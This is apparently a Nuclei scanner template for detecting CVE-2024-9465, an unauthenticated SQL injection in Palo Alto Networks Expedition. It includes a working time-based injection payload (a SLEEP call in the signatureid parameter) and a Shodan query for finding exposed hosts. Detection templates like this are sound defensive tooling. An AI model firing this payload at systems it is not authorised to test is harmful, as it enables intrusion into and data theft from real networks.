id: CVE-2024-9465

info:
  name: Palo Alto Expedition - SQL Injection
  author: DhiyaneshDK
  severity: high
  description: |
    An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.
  impact: |
    Unauthenticated attackers can exploit SQL injection to reveal Expedition database contents including password hashes, usernames, device configurations, and API keys, and create or read arbitrary files on the system.
  remediation: |
    Apply security updates from Palo Alto Networks as specified in security advisory PAN-SA-2024-0010 to address the SQL injection vulnerability in Expedition.
  reference:
    - https://security.paloaltonetworks.com/PAN-SA-2024-0010
    - https://github.com/horizon3ai/CVE-2024-9465/tree/main
    - https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9465
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2024-9465
    cwe-id: CWE-89
    epss-score: 0.94286
    epss-percentile: 0.99943
  metadata:
    verified: true
    max-request: 2
    vendor: paloaltonetworks
    product: expedition
    shodan-query: http.favicon.hash:1499876150
  tags: time-based-sqli,cve,cve2024,palo-alto,sqli,kev,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=get&type=existing_ruleBases&project=pandbRBAC

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "ruleBasesNames")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(6)))test)

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100d5db9b05a38732914678a6d990df2772b86f4882463955ce7bd4abff94f97e16022100d812524ca758e7e29d0f021f705577e71264611c5f9d130b4a22803b9c123330:922c64590222798bb761d5b6d8e72950